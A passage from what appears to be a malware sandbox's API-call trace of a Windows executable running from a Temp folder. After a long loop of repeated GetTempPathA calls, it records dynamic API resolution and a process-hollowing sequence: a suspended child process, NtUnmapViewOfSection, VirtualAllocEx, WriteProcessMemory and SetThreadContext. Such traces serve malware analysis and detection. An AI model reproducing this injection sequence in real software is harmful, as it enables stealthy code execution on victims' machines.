lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0107.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0108.033] VirtualProtect (in: lpAddress=0x233530, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0108.034] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0108.034] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0108.034] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.034] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0108.034] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0108.035] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0108.035] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0108.035] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0108.035] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0108.035] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0108.035] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x6019a [0108.192] PostMessageA (hWnd=0x6019a, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0108.192] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0108.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0108.192] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.192] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.192] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xcb4, dwThreadId=0xcb8)) returned 1 [0108.194] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0108.194] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0108.194] GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0108.230] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0108.230] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0108.230] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0108.230] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x2347d0*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2347d0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.231] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x234bd0, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0108.231] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x234bd0*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x234bd0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.237] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x2891d0*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2891d0*, lpNumberOfBytesWritten=0x0) returned 1 [0108.237] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffd5008, lpBuffer=0x234904*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x234904*, lpNumberOfBytesWritten=0x0) returned 1 [0108.237] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, 